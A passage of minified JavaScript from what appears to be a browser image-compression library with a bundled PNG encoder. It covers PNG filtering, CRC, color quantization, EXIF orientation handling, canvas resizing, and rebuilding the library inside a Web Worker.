Uint8Array($.width*$.height*4),0==ie[j-1].dispose?(UPNG._copyTile(F,we,de,ee.img,$.width,$.height,-$.x,-$.y,0),UPNG.encode._prepareDiff(b,we,de,ee.img,$)):UPNG._copyTile(b,we,de,ee.img,$.width,$.height,-$.x,-$.y,0)},UPNG.encode._prepareDiff=function(Pe,we,de,ie,j){UPNG._copyTile(Pe,we,de,ie,j.width,j.height,-j.x,-j.y,2)},UPNG.encode._filterZero=function(Pe,we,de,ie,j,$,ae){var I,Q=[],F=[0,1,2,3,4];-1!=$?F=[$]:(we*ie>5e5||1==de)&&(F=[0]),ae&&(I={level:0});for(var E,g=UZIP,b=0;b<F.length;b++){for(var _=0;_<we;_++)UPNG.encode._filterLine(j,Pe,_,ie,de,F[b]);Q.push(g.deflate(j,I))}var y=1e9;for(b=0;b<Q.length;b++)Q[b].length<y&&(E=b,y=Q[b].length);return Q[E]},UPNG.encode._filterLine=function(Pe,we,de,ie,j,$){var ae=de*ie,I=ae+de,Q=UPNG.decode._paeth;if(Pe[I]=$,I++,0==$)if(ie<500)for(var F=0;F<ie;F++)Pe[I+F]=we[ae+F];else Pe.set(new Uint8Array(we.buffer,ae,ie),I);else if(1==$){for(F=0;F<j;F++)Pe[I+F]=we[ae+F];for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]-we[ae+F-j]+256&255}else if(0==de){for(F=0;F<j;F++)Pe[I+F]=we[ae+F];if(2==$)for(F=j;F<ie;F++)Pe[I+F]=we[ae+F];if(3==$)for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]-(we[ae+F-j]>>1)+256&255;if(4==$)for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]-Q(we[ae+F-j],0,0)+256&255}else{if(2==$)for(F=0;F<ie;F++)Pe[I+F]=we[ae+F]+256-we[ae+F-ie]&255;if(3==$){for(F=0;F<j;F++)Pe[I+F]=we[ae+F]+256-(we[ae+F-ie]>>1)&255;for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]+256-(we[ae+F-ie]+we[ae+F-j]>>1)&255}if(4==$){for(F=0;F<j;F++)Pe[I+F]=we[ae+F]+256-Q(0,we[ae+F-ie],0)&255;for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]+256-Q(we[ae+F-j],we[ae+F-ie],we[ae+F-j-ie])&255}}},UPNG.crc={table:function(){for(var Pe=new Uint32Array(256),we=0;we<256;we++){for(var de=we,ie=0;ie<8;ie++)1&de?de=3988292384^de>>>1:de>>>=1;Pe[we]=de}return Pe}(),update:function(we,de,ie,j){for(var $=0;$<j;$++)we=UPNG.crc.table[255&(we^de[ie+$])]^we>>>8;return we},crc:function(we,de,ie){return 4294967295^UPNG.crc.update(4294967295,we,de,ie)}},UPNG.quantize=function(Pe,we){var de,ie=new Uint8Array(Pe),j=ie.slice(0),$=new Uint32Array(j.buffer),ae=UPNG.quantize.getKDtree(j,we),I=ae[0],Q=ae[1],F=UPNG.quantize.planeDst,E=ie,g=$,b=E.length,_=new Uint8Array(ie.length>>2);if(ie.length<2e7)for(var y=0;y<b;y+=4){var M=.00392156862745098*E[y],p=E[y+1]*(1/255),D=E[y+2]*(1/255),w=E[y+3]*(1/255);de=UPNG.quantize.getNearest(I,M,p,D,w),_[y>>2]=de.ind,g[y>>2]=de.est.rgba}else for(y=0;y<b;y+=4){for(M=E[y]*(1/255),p=E[y+1]*(1/255),D=E[y+2]*(1/255),w=E[y+3]*(1/255),de=I;de.left;)de=F(de.est,M,p,D,w)<=0?de.left:de.right;_[y>>2]=de.ind,g[y>>2]=de.est.rgba}return{abuf:j.buffer,inds:_,plte:Q}},UPNG.quantize.getKDtree=function(Pe,we,de){null==de&&(de=1e-4);var ie=new Uint32Array(Pe.buffer),j={i0:0,i1:Pe.length,bst:null,est:null,tdst:0,left:null,right:null};j.bst=UPNG.quantize.stats(Pe,j.i0,j.i1),j.est=UPNG.quantize.estats(j.bst);for(var $=[j];$.length<we;){for(var ae=0,I=0,Q=0;Q<$.length;Q++)$[Q].est.L>ae&&(ae=$[Q].est.L,I=Q);if(ae<de)break;var F=$[I],E=UPNG.quantize.splitPixels(Pe,ie,F.i0,F.i1,F.est.e,F.est.eMq255);if(F.i0>=E||F.i1<=E)F.est.L=0;else{var g={i0:F.i0,i1:E,bst:null,est:null,tdst:0,left:null,right:null};g.bst=UPNG.quantize.stats(Pe,g.i0,g.i1),g.est=UPNG.quantize.estats(g.bst);var b={i0:E,i1:F.i1,bst:null,est:null,tdst:0,left:null,right:null};for(b.bst={R:[],m:[],N:F.bst.N-g.bst.N},Q=0;Q<16;Q++)b.bst.R[Q]=F.bst.R[Q]-g.bst.R[Q];for(Q=0;Q<4;Q++)b.bst.m[Q]=F.bst.m[Q]-g.bst.m[Q];b.est=UPNG.quantize.estats(b.bst),F.left=g,F.right=b,$[I]=g,$.push(b)}}for($.sort(function(_,y){return y.bst.N-_.bst.N}),Q=0;Q<$.length;Q++)$[Q].ind=Q;return[j,$]},UPNG.quantize.getNearest=function(Pe,we,de,ie,j){if(null==Pe.left)return Pe.tdst=UPNG.quantize.dist(Pe.est.q,we,de,ie,j),Pe;var $=UPNG.quantize.planeDst(Pe.est,we,de,ie,j),ae=Pe.left,I=Pe.right;$>0&&(ae=Pe.right,I=Pe.left);var Q=UPNG.quantize.getNearest(ae,we,de,ie,j);if(Q.tdst<=$*$)return Q;var F=UPNG.quantize.getNearest(I,we,de,ie,j);return F.tdst<Q.tdst?F:Q},UPNG.quantize.planeDst=function(Pe,we,de,ie,j){var $=Pe.e;return $[0]*we+$[1]*de+$[2]*ie+$[3]*j-Pe.eMq},UPNG.quantize.dist=function(Pe,we,de,ie,j){var $=we-Pe[0],ae=de-Pe[1],I=ie-Pe[2],Q=j-Pe[3];return $*$+ae*ae+I*I+Q*Q},UPNG.quantize.splitPixels=function(Pe,we,de,ie,j,$){var ae=UPNG.quantize.vecDot;for(ie-=4;de<ie;){for(;ae(Pe,de,j)<=$;)de+=4;for(;ae(Pe,ie,j)>$;)ie-=4;if(de>=ie)break;var I=we[de>>2];we[de>>2]=we[ie>>2],we[ie>>2]=I,de+=4,ie-=4}for(;ae(Pe,de,j)>$;)de-=4;return de+4},UPNG.quantize.vecDot=function(Pe,we,de){return Pe[we]*de[0]+Pe[we+1]*de[1]+Pe[we+2]*de[2]+Pe[we+3]*de[3]},UPNG.quantize.stats=function(Pe,we,de){for(var ie=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],j=[0,0,0,0],$=de-we>>2,ae=we;ae<de;ae+=4){var I=.00392156862745098*Pe[ae],Q=Pe[ae+1]*(1/255),F=Pe[ae+2]*(1/255),E=Pe[ae+3]*(1/255);j[0]+=I,j[1]+=Q,j[2]+=F,j[3]+=E,ie[0]+=I*I,ie[1]+=I*Q,ie[2]+=I*F,ie[3]+=I*E,ie[5]+=Q*Q,ie[6]+=Q*F,ie[7]+=Q*E,ie[10]+=F*F,ie[11]+=F*E,ie[15]+=E*E}return ie[4]=ie[1],ie[8]=ie[2],ie[9]=ie[6],ie[12]=ie[3],ie[13]=ie[7],ie[14]=ie[11],{R:ie,m:j,N:$}},UPNG.quantize.estats=function(Pe){var we=Pe.R,de=Pe.m,ie=Pe.N,j=de[0],$=de[1],ae=de[2],I=de[3],Q=0==ie?0:1/ie,F=[we[0]-j*j*Q,we[1]-j*$*Q,we[2]-j*ae*Q,we[3]-j*I*Q,we[4]-$*j*Q,we[5]-$*$*Q,we[6]-$*ae*Q,we[7]-$*I*Q,we[8]-ae*j*Q,we[9]-ae*$*Q,we[10]-ae*ae*Q,we[11]-ae*I*Q,we[12]-I*j*Q,we[13]-I*$*Q,we[14]-I*ae*Q,we[15]-I*I*Q],E=F,g=UPNG.M4,b=[Math.random(),Math.random(),Math.random(),Math.random()],_=0,y=0;if(0!=ie)for(var M=0;M<16&&(b=g.multVec(E,b),y=Math.sqrt(g.dot(b,b)),b=g.sml(1/y,b),!(0!=M&&Math.abs(y-_)<1e-9));M++)_=y;var p=[j*Q,$*Q,ae*Q,I*Q];return{Cov:F,q:p,e:b,L:_,eMq255:g.dot(g.sml(255,p),b),eMq:g.dot(b,p),rgba:(Math.round(255*p[3])<<24|Math.round(255*p[2])<<16|Math.round(255*p[1])<<8|Math.round(255*p[0])<<0)>>>0}},UPNG.M4={multVec:function(we,de){return[we[0]*de[0]+we[1]*de[1]+we[2]*de[2]+we[3]*de[3],we[4]*de[0]+we[5]*de[1]+we[6]*de[2]+we[7]*de[3],we[8]*de[0]+we[9]*de[1]+we[10]*de[2]+we[11]*de[3],we[12]*de[0]+we[13]*de[1]+we[14]*de[2]+we[15]*de[3]]},dot:function(we,de){return we[0]*de[0]+we[1]*de[1]+we[2]*de[2]+we[3]*de[3]},sml:function(we,de){return[we*de[0],we*de[1],we*de[2],we*de[3]]}},UPNG.encode.concatRGBA=function(Pe){for(var we=0,de=0;de<Pe.length;de++)we+=Pe[de].byteLength;var ie=new Uint8Array(we),j=0;for(de=0;de<Pe.length;de++){for(var $=new Uint8Array(Pe[de]),ae=$.length,I=0;I<ae;I+=4){var Q=$[I],F=$[I+1],E=$[I+2],g=$[I+3];0==g&&(Q=F=E=0),ie[j+I]=Q,ie[j+I+1]=F,ie[j+I+2]=E,ie[j+I+3]=g}j+=ae}return ie.buffer};var BROWSER_NAME={CHROME:"CHROME",FIREFOX:"FIREFOX",DESKTOP_SAFARI:"DESKTOP_SAFARI",IE:"IE",MOBILE_SAFARI:"MOBILE_SAFARI",ETC:"ETC"},_BROWSER_NAME$CHROME$,MAX_CANVAS_SIZE=(_BROWSER_NAME$CHROME$={},_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.CHROME,16384),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.FIREFOX,11180),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.DESKTOP_SAFARI,16384),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.IE,8192),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.MOBILE_SAFARI,4096),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.ETC,8192),_BROWSER_NAME$CHROME$),isBrowser="undefined"!=typeof window,moduleMapper=isBrowser&&window.cordova&&window.cordova.require&&window.cordova.require("cordova/modulemapper"),CustomFile=isBrowser&&(moduleMapper&&moduleMapper.getOriginalSymbol(window,"File")||void 0!==window.File&&File),CustomFileReader=isBrowser&&(moduleMapper&&moduleMapper.getOriginalSymbol(window,"FileReader")||void 0!==window.FileReader&&FileReader);function getFilefromDataUrl(Pe,we){var de=arguments.length>2&&void 0!==arguments[2]?arguments[2]:Date.now();return new Promise(function(ie){for(var j=Pe.split(","),$=j[0].match(/:(.*?);/)[1],ae=globalThis.atob(j[1]),I=ae.length,Q=new Uint8Array(I);I--;)Q[I]=ae.charCodeAt(I);var F=new Blob([Q],{type:$});F.name=we,F.lastModified=de,ie(F)})}function getDataUrlFromFile(Pe){return new Promise(function(we,de){var ie=new CustomFileReader;ie.onload=function(){return we(ie.result)},ie.onerror=function(j){return de(j)},ie.readAsDataURL(Pe)})}function loadImage(Pe){return new Promise(function(we,de){var ie=new Image;ie.onload=function(){return we(ie)},ie.onerror=function(j){return de(j)},ie.src=Pe})}function getBrowserName(){if(void 0!==getBrowserName.cachedResult)return getBrowserName.cachedResult;var Pe=BROWSER_NAME.ETC,we=navigator.userAgent;return/Chrom(e|ium)/i.test(we)?Pe=BROWSER_NAME.CHROME:/iP(ad|od|hone)/i.test(we)&&/WebKit/i.test(we)&&!/(CriOS|FxiOS|OPiOS|mercury)/i.test(we)?Pe=BROWSER_NAME.MOBILE_SAFARI:/Safari/i.test(we)?Pe=BROWSER_NAME.DESKTOP_SAFARI:/Firefox/i.test(we)?Pe=BROWSER_NAME.FIREFOX:(/MSIE/i.test(we)||!!document.documentMode)&&(Pe=BROWSER_NAME.IE),getBrowserName.cachedResult=Pe,getBrowserName.cachedResult}function approximateBelowMaximumCanvasSizeOfBrowser(Pe,we){for(var de=getBrowserName(),ie=MAX_CANVAS_SIZE[de],j=Pe,$=we,ae=j*$,I=j>$?$/j:j/$;ae>ie*ie;){var Q=(ie+j)/2,F=(ie+$)/2;Q<F?($=F,j=F*I):($=Q*I,j=Q),ae=j*$}return{width:j,height:$}}function getNewCanvasAndCtx(Pe,we){var de,ie;try{if(null===(ie=(de=new OffscreenCanvas(Pe,we)).getContext("2d")))throw new Error("getContext of OffscreenCanvas returns null")}catch(j){ie=(de=document.createElement("canvas")).getContext("2d")}return de.width=Pe,de.height=we,[de,ie]}function drawImageInCanvas(Pe){var we=arguments.length>1&&void 0!==arguments[1]?arguments[1]:void 0,de=approximateBelowMaximumCanvasSizeOfBrowser(Pe.width,Pe.height),ie=de.width,j=de.height,$=getNewCanvasAndCtx(ie,j),ae=_slicedToArray($,2),I=ae[0],Q=ae[1];return we&&/jpe?g/.test(we)&&(Q.fillStyle="white",Q.fillRect(0,0,I.width,I.height)),Q.drawImage(Pe,0,0,I.width,I.height),I}function isIOS(){return void 0!==isIOS.cachedResult||(isIOS.cachedResult=["iPad Simulator","iPhone Simulator","iPod Simulator","iPad","iPhone","iPod"].includes(navigator.platform)||navigator.userAgent.includes("Mac")&&"undefined"!=typeof document&&"ontouchend"in document),isIOS.cachedResult}function drawFileInCanvas(Pe){var we=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};return new Promise(function(de,ie){var j,$,ae=function(){try{return $=drawImageInCanvas(j,we.fileType||Pe.type),de([j,$])}catch(F){return ie(F)}},I=function(F){try{var E=function(b){try{throw b}catch(_){return ie(_)}};try{return getDataUrlFromFile(Pe).then(function(g){try{return loadImage(g).then(function(b){try{return j=b,function(){try{return ae()}catch(y){return ie(y)}}()}catch(_){return E(_)}},E)}catch(b){return E(b)}},E)}catch(g){E(g)}}catch(g){return ie(g)}};try{if(isIOS()||[BROWSER_NAME.DESKTOP_SAFARI,BROWSER_NAME.MOBILE_SAFARI].includes(getBrowserName()))throw new Error("Skip createImageBitmap on IOS and Safari");return createImageBitmap(Pe).then(function(Q){try{return j=Q,ae()}catch(F){return I()}},I)}catch(Q){I()}})}function canvasToFile(Pe,we,de,ie){var j=arguments.length>4&&void 0!==arguments[4]?arguments[4]:1;return new Promise(function($,ae){var I,Q,F;if("image/png"===we)return Q=Pe.getContext("2d").getImageData(0,0,Pe.width,Pe.height).data,F=UPNG.encode([Q],Pe.width,Pe.height,256*j),(I=new Blob([F],{type:we})).name=de,I.lastModified=ie,E.call(this);{let g=function(){return E.call(this)};return"function"==typeof OffscreenCanvas&&Pe instanceof OffscreenCanvas?Pe.convertToBlob({type:we,quality:j}).then(function(b){try{return(I=b).name=de,I.lastModified=ie,g.call(this)}catch(_){return ae(_)}}.bind(this),ae):getFilefromDataUrl(Pe.toDataURL(we,j),de,ie).then(function(b){try{return I=b,g.call(this)}catch(_){return ae(_)}}.bind(this),ae)}function E(){return $(I)}})}function cleanupCanvasMemory(Pe){Pe.width=0,Pe.height=0}function isAutoOrientationInBrowser(){return new Promise(function(Pe,we){var de,ie,j,$;return void 0!==isAutoOrientationInBrowser.cachedResult?Pe(isAutoOrientationInBrowser.cachedResult):getFilefromDataUrl("data:image/jpeg;base64,/9j/4QAiRXhpZgAATU0AKgAAAAgAAQESAAMAAAABAAYAAAAAAAD/2wCEAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAf/AABEIAAEAAgMBEQACEQEDEQH/xABKAAEAAAAAAAAAAAAAAAAAAAALEAEAAAAAAAAAAAAAAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwA/8H//2Q==","test.jpg",Date.now()).then(function(ae){try{return drawFileInCanvas(de=ae).then(function(I){try{return canvasToFile(ie=I[1],de.type,de.name,de.lastModified).then(function(Q){try{return j=Q,cleanupCanvasMemory(ie),drawFileInCanvas(j).then(function(F){try{return isAutoOrientationInBrowser.cachedResult=1===($=F[0]).width&&2===$.height,Pe(isAutoOrientationInBrowser.cachedResult)}catch(E){return we(E)}},we)}catch(F){return we(F)}},we)}catch(Q){return we(Q)}},we)}catch(I){return we(I)}},we)})}function getExifOrientation(Pe){return new Promise(function(we,de){var ie=new CustomFileReader;ie.onload=function(j){var $=new DataView(j.target.result);if(65496!=$.getUint16(0,!1))return we(-2);for(var ae=$.byteLength,I=2;I<ae;){if($.getUint16(I+2,!1)<=8)return we(-1);var Q=$.getUint16(I,!1);if(I+=2,65505==Q){if(1165519206!=$.getUint32(I+=2,!1))return we(-1);var F=18761==$.getUint16(I+=6,!1);I+=$.getUint32(I+4,F);var E=$.getUint16(I,F);I+=2;for(var g=0;g<E;g++)if(274==$.getUint16(I+12*g,F))return we($.getUint16(I+12*g+8,F))}else{if(65280!=(65280&Q))break;I+=$.getUint16(I,!1)}}return we(-1)},ie.onerror=function(j){return de(j)},ie.readAsArrayBuffer(Pe)})}function handleMaxWidthOrHeight(Pe,we){var de,ie=Pe.width,j=Pe.height,$=we.maxWidthOrHeight,ae=Pe;if(isFinite($)&&(ie>$||j>$)){var I=_slicedToArray(getNewCanvasAndCtx(ie,j),2);ae=I[0],de=I[1],ie>j?(ae.width=$,ae.height=j/ie*$):(ae.width=ie/j*$,ae.height=$),de.drawImage(Pe,0,0,ae.width,ae.height),cleanupCanvasMemory(Pe)}return ae}function followExifOrientation(Pe,we){var de=Pe.width,ie=Pe.height,j=_slicedToArray(getNewCanvasAndCtx(de,ie),2),$=j[0],ae=j[1];switch(we>4&&we<9?($.width=ie,$.height=de):($.width=de,$.height=ie),we){case 2:ae.transform(-1,0,0,1,de,0);break;case 3:ae.transform(-1,0,0,-1,de,ie);break;case 4:ae.transform(1,0,0,-1,0,ie);break;case 5:ae.transform(0,1,1,0,0,0);break;case 6:ae.transform(0,1,-1,0,ie,0);break;case 7:ae.transform(0,-1,-1,0,ie,de);break;case 8:ae.transform(0,-1,1,0,0,de)}return ae.drawImage(Pe,0,0,de,ie),cleanupCanvasMemory(Pe),$}function compress(Pe,we){var de=arguments.length>2&&void 0!==arguments[2]?arguments[2]:0;return new Promise(function(ie,j){var $,ae,I,Q,F,E,g,b,_,y,M,p,D,w,x,S,O,U,K;function ee(){var ve=arguments.length>0&&void 0!==arguments[0]?arguments[0]:5;if(we.signal&&we.signal.aborted)throw we.signal.reason;$+=ve,we.onProgress(Math.min($,100))}function se(ve){if(we.signal&&we.signal.aborted)throw we.signal.reason;$=Math.min(Math.max(ve,$),100),we.onProgress($)}return $=de,ae=we.maxIteration||10,I=1024*we.maxSizeMB*1024,ee(),drawFileInCanvas(Pe,we).then(function(ve){try{var le=_slicedToArray(ve,2);return Q=le[1],ee(),F=handleMaxWidthOrHeight(Q,we),ee(),new Promise(function(ye,z){var l;if(!(l=we.exifOrientation))return getExifOrientation(Pe).then(function(A){try{return l=A,f.call(this)}catch(v){return z(v)}}.bind(this),z);function f(){return ye(l)}return f.call(this)}).then(function(ye){try{return E=ye,ee(),isAutoOrientationInBrowser().then(function(z){try{return g=z?F:followExifOrientation(F,E),ee(),canvasToFile(g,_=we.fileType||Pe.type,Pe.name,Pe.lastModified,b=we.initialQuality||1).then(function(l){try{{let A=function(){if(ae--&&(x>I||x>D)){var P,G,X=_slicedToArray(getNewCanvasAndCtx(P=K?.95*U.width:U.width,G=K?.95*U.height:U.height),2);return O=X[0],X[1].drawImage(U,0,0,P,G),canvasToFile(O,_,Pe.name,Pe.lastModified,b*=.95).then(function(L){try{return S=L,cleanupCanvasMemory(U),U=O,x=S.size,se(Math.min(99,Math.floor((w-x)/(w-I)*100))),A}catch(h){return j(h)}},j)}return[1]},v=function(){return cleanupCanvasMemory(U),cleanupCanvasMemory(O),cleanupCanvasMemory(F),cleanupCanvasMemory(g),cleanupCanvasMemory(Q),se(100),ie(S)};return y=l,ee(),p=y.size>Pe.size,(M=y.size>I)||p?(D=Pe.size,x=w=y.size,U=g,K=!we.alwaysKeepResolution&&M,(f=function(P){for(;P;){if(P.then)return void P.then(f,j);try{if(P.pop){if(P.length)return P.pop()?v.call(this):P;P=A}else P=P.call(this)}catch(G){return j(G)}}}.bind(this))(A)):(se(100),ie(y));var f}}catch(A){return j(A)}}.bind(this),j)}catch(l){return j(l)}}.bind(this),j)}catch(z){return j(z)}}.bind(this),j)}catch(ye){return j(ye)}}.bind(this),j)})}var cnt=0,imageCompressionLibUrl,worker;function createWorker(Pe){var we=[];return we.push("function"==typeof Pe?"(".concat(Pe,")()"):Pe),new Worker(URL.createObjectURL(new Blob(we)))}function createSourceObject(Pe){return URL.createObjectURL(new Blob([Pe],{type:"application/javascript"}))}function stringify(Pe){return JSON.stringify(Pe,function(we,de){return"function"==typeof de?"BIC_FN:::(function () { return ".concat(de.toString()," })()"):de})}function parse(o){if("string"==typeof o)return o;var result={};return Object.entries(o).forEach(function(_ref){var _ref2=_slicedToArray(_ref,2),key=_ref2[0],value=_ref2[1];if("string"==typeof value&&value.startsWith("BIC_FN:::"))try{result[key]=eval(value.replace(/^BIC_FN:::/,""))}catch(Pe){throw Pe}else result[key]=parse(value)}),result}function generateLib(){return createSourceObject("\n    // reconstruct library\n    function imageCompression (){return (".concat(imageCompression,").apply(null, arguments)}\n\n    imageCompression.getDataUrlFromFile = ").concat(imageCompression.getDataUrlFromFile,"\n    imageCompression.getFilefromDataUrl = ").concat(imageCompression.getFilefromDataUrl,"\n    imageCompression.loadImage = ").concat(imageCompression.loadImage,"\n    imageCompression.drawImageInCanvas = ").concat(imageCompression.drawImageInCanvas,"\n    imageCompression.drawFileInCanvas = ").concat(imageCompression.drawFileInCanvas,"\n    imageCompression.canvasToFile = ").concat(imageCompression.canvasToFile,"\n    imageCompression.getExifOrientation = ").concat(imageCompression.getExifOrientation,"\n    imageCompression.handleMaxWidthOrHeight = ").concat(imageCompression.handleMaxWidthOrHeight,"\n    imageCompression.followExifOrientation = ").concat(imageCompression.followExifOrientation,"\n    imageCompression.cleanupCanvasMemory = ").concat(imageCompression.cleanupCanvasMemory,"\n    imageCompression.isAutoOrientationInBrowser = ").concat(imageCompression.isAutoOrientationInBrowser,"\n    imageCompression.approximateBelowMaximumCanvasSizeOfBrowser = ").concat(imageCompression.approximateBelowMaximumCanvasSizeOfBrowser,"\n    imageCompression.getBrowserName = ").concat(imageCompression.getBrowserName,"\n\n    // functions / objects\n    getDataUrlFromFile = imageCompression.getDataUrlFromFile\n    getFilefromDataUrl = imageCompression.getFilefromDataUrl\n    loadImage = imageCompression.loadImage\n    drawImageInCanvas = imageCompression.drawImageInCanvas\n    drawFileInCanvas = imageCompression.drawFileInCanvas\n    canvasToFile = imageCompression.canvasToFile\n    getExifOrientation = imageCompression.getExifOrientation\n    handleMaxWidthOrHeight = imageCompression.handleMaxWidthOrHeight\n    followExifOrientation = imageCompression.followExifOrientation\n    cleanupCanvasMemory = imageCompression.cleanupCanvasMemory\n    isAutoOrientationInBrowser = imageCompression.isAutoOrientationInBrowser\n    approximateBelowMaximumCanvasSizeOfBrowser = imageCompression.approximateBelowMaximumCanvasSizeOfBrowser\n    getBrowserName = imageCompression.getBrowserName\n    isIOS = ").concat(isIOS,"\n    \n    getNewCanvasAndCtx = ").concat(getNewCanvasAndCtx,"\n    CustomFileReader = FileReader\n    CustomFile = File\n    MAX_CANVAS_SIZE = ").concat(JSON.stringify(MAX_CANVAS_SIZE),"\n    BROWSER_NAME = ").concat(JSON.stringify(BROWSER_NAME),"\n    function compress (){return (").concat(compress,").apply(null, arguments)}\n\n    // core-js\n    function _slicedToArray(arr, n) { return arr }\n    function _typeof(a) { return typeof a }\n    function _objectSpread2(target) {\n      for (var i = 1; i < arguments.length; i++) {\n        var source = arguments[i] != null ? arguments[i] : {};\n  \n        Object.assign(target, source)\n      }\n  \n      return target;\n    }\n\n    // Libraries\n    const parse = ").concat(parse,"\n    const UPNG = {}\n    UPNG.toRGBA8 = ").concat(UPNG.toRGBA8,"\n    UPNG.toRGBA8.decodeImage = ").concat(UPNG.toRGBA8.decodeImage,"\n    UPNG.decode = ").concat(UPNG.decode,"\n    UPNG.decode._decompress = ").concat(UPNG.decode._decompress,"\n    UPNG.decode._inflate = ").concat(UPNG.decode._inflate,"\n    UPNG.decode._readInterlace = ").concat(UPNG.decode._readInterlace,"\n    UPNG.decode._getBPP = ").concat(UPNG.decode._getBPP," \n    UPNG.decode._filterZero = ").concat(UPNG.decode._filterZero,"\n    UPNG.decode._paeth = ").concat(UPNG.decode._paeth,"\n    UPNG.decode._IHDR = ").concat(UPNG.decode._IHDR,"\n    UPNG._bin = parse(").concat(stringify(UPNG._bin),")\n    UPNG._copyTile = ").concat(UPNG._copyTile,"\n    UPNG.encode = ").concat(UPNG.encode,"\n    UPNG.encodeLL = ").concat(UPNG.encodeLL," \n    UPNG.encode._main = ").concat(UPNG.encode._main,"\n    UPNG.encode.compressPNG = ").concat(UPNG.encode.compressPNG," \n    UPNG.encode.compress = ").concat(UPNG.encode.compress,"\n    UPNG.encode.framize = ").concat(UPNG.encode.framize," \n    UPNG.encode._updateFrame = ").concat(UPNG.encode._updateFrame," \n    UPNG.encode._prepareDiff = ").concat(UPNG.encode._prepareDiff," \n    UPNG.encode._filterZero = ").concat(UPNG.encode._filterZero," \n    UPNG.encode._filterLine = ").concat(UPNG.encode._filterLine,"\n    UPNG.encode.concatRGBA = ").concat(UPNG.encode.concatRGBA,"\n    UPNG.crc = parse(").concat(stringify(UPNG.crc),")\n    UPNG.crc.table = ( function() {\n    var tab = new Uint32Array(256);\n    for (var n=0; n<256; n++) {\n      var c = n;\n      for (var k=0; k<8; k++) {\n        if (c & 1)  c = 0xedb88320 ^ (c >>> 1);\n        else        c = c >>> 1;\n      }\n      tab[n] = c;  }\n    return tab;  })()\n    UPNG.quantize = ").concat(UPNG.quantize," \n    UPNG.quantize.getKDtree = ").concat(UPNG.quantize.getKDtree," \n    UPNG.quantize.getNearest = ").concat(UPNG.quantize.getNearest," \n    UPNG.quantize.planeDst = ").concat(UPNG.quantize.planeDst," \n    UPNG.quantize.dist = ").concat(UPNG.quantize.dist,"     \n    UPNG.quantize.splitPixels = ").concat(UPNG.quantize.splitPixels," \n    UPNG.quantize.vecDot = ").concat(UPNG.quantize.vecDot," \n    UPNG.quantize.stats = ").concat(UPNG.quantize.stats," \n    UPNG.quantize.estats = ").concat(UPNG.quantize.estats,"\n    UPNG.M4 = parse(").concat(stringify(UPNG.M4),")\n    UPNG.encode.concatRGBA = ").concat(UPNG.encode.concatRGBA,'\n    UPNG.inflateRaw=function(){\n    var H={};H.H={};H.H.N=function(N,W){var R=Uint8Array,i=0,m=0,J=0,h=0,Q=0,X=0,u=0,w=0,d=0,v,C;\n      if(N[0]==3&&N[1]==0)return W?W:new R(0);var V=H.H,n=V.b,A=V.e,l=V.R,M=V.n,I=V.A,e=V.Z,b=V.m,Z=W==null;\n      if(Z)W=new R(N.length>>>2<<5);while(i==0){i=n(N,d,1);m=n(N,d+1,2);d+=3;if(m==0){if((d&7)!=0)d+=8-(d&7);\n        var D=(d>>>3)+4,q=N[D-4]|N[D-3]<<8;if(Z)W=H.H.W(W,w+q);W.set(new R(N.buffer,N.byteOffset+D,q),w);d=D+q<<3;\n        w+=q;continue}if(Z)W=H.H.W(W,w+(1<<17));if(m==1){v=b.J;C=b.h;X=(1<<9)-1;u=(1<<5)-1}if(m==2){J=A(N,d,5)+257;\n        h=A(N,d+5,5)+1;Q=A(N,d+10,4)+4;d+=14;var E=d,j=1;for(var c=0;c<38;c+=2){b.Q[c]=0;b.Q[c+1]=0}for(var c=0;\n                                                                                                        c<Q;c++){var K=A(N,d+c*3,3);b.Q[(b.X[c]<<1)+1]=K;if(K>j)j=K}d+=3*Q;M(b.Q,j);I(b.Q,j,b.u);v=b.w;C=b.d;\n        d=l(b.u,(1<<j)-1,J+h,N,d,b.v);var r=V.V(b.v,0,J,b.C);X=(1<<r)-1;var S=V.V(b.v,J,h,b.D);u=(1<<S)-1;M(b.C,r);\n        I(b.C,r,v);M(b.D,S);I(b.D,S,C)}while(!0){var T=v[e(N,d)&X];d+=T&15;var p=T>>>4;if(p>>>8==0){W[w++]=p}else if(p==256){break}else{var z=w+p-254;\n        if(p>264){var _=b.q[p-257];z=w+(_>>>3)+A(N,d,_&7);d+=_&7}var $=C[e(N,d)&u];d+=$&15;var s=$>>>4,Y=b.c[s],a=(Y>>>4)+n(N,d,Y&15);\n        d+=Y&15;while(w<z){W[w]=W[w++-a];W[w]=W[w++-a];W[w]=W[w++-a];W[w]=W[w++-a]}w=z}}}return W.length==w?W:W.slice(0,w)};\n      H.H.W=function(N,W){var R=N.length;if(W<=R)return N;var V=new Uint8Array(R<<1);V.set(N,0);return V};\n      H.H.R=function(N,W,R,V,n,A){var l=H.H.e,M=H.H.Z,I=0;while(I<R){var e=N[M(V,n)&W];n+=e&15;var b=e>>>4;\n        if(b<=15){A[I]=b;I++}else{var Z=0,m=0;if(b==16){m=3+l(V,n,2);n+=2;Z=A[I-1]}else if(b==17){m=3+l(V,n,3);\n          n+=3}else if(b==18){m=11+l(V,n,7);n+=7}var J=I+m;while(I<J){A[I]=Z;I++}}}return n};H.H.V=function(N,W,R,V){var n=0,A=0,l=V.length>>>1;\n        while(A<R){var M=N[A+W];V[A<<1]=0;V[(A<<1)+1]=M;if(M>n)n=M;A++}while(A<l){V[A<<1]=0;V[(A<<1)+1]=0;A++}return n};\n      H.H.n=function(N,W){var 